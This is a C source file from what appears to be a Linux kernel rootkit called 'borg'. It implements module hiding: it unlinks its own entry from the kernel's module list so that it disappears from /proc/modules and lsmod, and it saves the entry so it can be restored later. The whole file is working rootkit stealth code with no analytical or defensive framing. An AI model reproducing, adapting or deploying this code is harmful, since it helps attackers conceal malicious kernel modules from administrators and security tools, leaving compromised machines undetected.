/**
 * @file proc.c
 * @brief Hide us from /proc.
 */

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/list.h>
#include "borg.h"

struct list_head *modules = (struct list_head *) MODULES;
struct module *saved = NULL;

void proc_modules_hide(int hide)
{
    struct module *mod, *tmp;

    _DEBUG(("%s: proc_modules_hide(%d)\n", BORG_VERSION, hide));
    
    list_for_each_entry_safe(mod, tmp, modules, list)
    {
	switch(hide)
	{
	    case 1:
		if(strcmp(mod->name, BORG_MODNAME) == 0)
		{
		    _DEBUG(("%s: proc_modules_hide(%d): HIDING MODULE: %s\n",
			BORG_VERSION, hide, mod->name));
		    
		    saved = mod;
		    list_del(&mod->list);
		    
		} else
		    _DEBUG(("%s: proc_modules_hide(%d): WRITING MODULE: %s\n",
			BORG_VERSION, hide, mod->name));
		break;
		
	    case 0:
		_DEBUG(("%s: proc_modules_hide(%d): RESTORING SAVED\n",
		    BORG_VERSION, hide));
		    
		if(saved != NULL)
		{
		    list_add(&saved->list, modules);
		    saved = NULL;
		}
		break;
	}
    }
}

void proc_hide(void)
{
    _DEBUG(("%s: proc_hide()\n", BORG_VERSION));
    proc_modules_hide(1);
}

void proc_unhide(void)
{
    _DEBUG(("%s: proc_unhide()\n", BORG_VERSION));
    proc_modules_hide(0);
}
